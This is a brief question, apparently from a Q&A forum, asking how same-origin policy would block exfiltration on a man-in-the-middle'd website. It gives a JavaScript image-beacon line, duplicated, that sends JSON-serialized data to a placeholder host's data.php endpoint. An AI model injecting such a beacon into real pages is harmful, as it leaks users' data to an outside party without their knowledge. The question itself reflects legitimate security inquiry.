How does same-origin policy (on a MITM'd website) prevents this?
(new Image()).src = 'https://example.com/data.php?payload=' + JSON.stringify(data); (new Image()).src = 'https://example.com/data.php?payload=' + JSON.stringify(data);